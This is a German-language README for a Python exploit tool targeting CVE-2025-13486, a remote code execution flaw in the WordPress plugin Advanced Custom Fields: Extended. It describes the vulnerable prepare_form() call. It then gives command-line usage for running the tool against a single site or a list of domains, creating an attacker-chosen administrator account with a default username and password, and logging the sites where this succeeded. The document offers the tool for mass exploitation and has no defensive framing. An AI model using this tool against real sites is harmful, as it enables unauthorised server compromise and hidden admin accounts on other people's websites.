
Das Advanced Custom Fields: Extended Plugin für WordPress ist in den Versionen 0.9.0.5 bis 0.9.1.1 über die prepare_form()-Funktion anfällig für Remote Code Execution.
Das Advanced Custom Fields: Extended-Plugin für WordPress ist in den Versionen 0.9.0.5 bis 0.9.1.1 über die Funktion prepare_form() anfällig für Remote-Codeausführung. Dies liegt daran, dass die Funktion Benutzereingaben akzeptiert und diese dann an call_user_func_array() übergibt. Dadurch können nicht authentifizierte Angreifer beliebigen Code auf dem Server ausführen, was genutzt werden kann, um Hintertüren einzuschleusen oder neue administrative Benutzerkonten zu erstellen.
Führen Sie das Skript über die Befehlszeile aus:
python CVE-2025-13486.py -l list.txt --email [email protected] --user new_user --password new_password
options:
-u, --url URL Einzelne Ziel-WordPress-Site-URL
-l yourlist.txt
Datei mit einer Liste von Domains/URLs
--email, --email EMAIL
Festzulegende E-Mail
--user USERNAME
Zu erstellender Benutzername (Standard: nemesis)
--password PASSWORD
Festzulegendes Passwort (Standard: Warga@Sipil1337)
-o output.txt
Ausgabedatei zum Speichern erfolgreicher Ergebnisse (Standard: success_results.txt)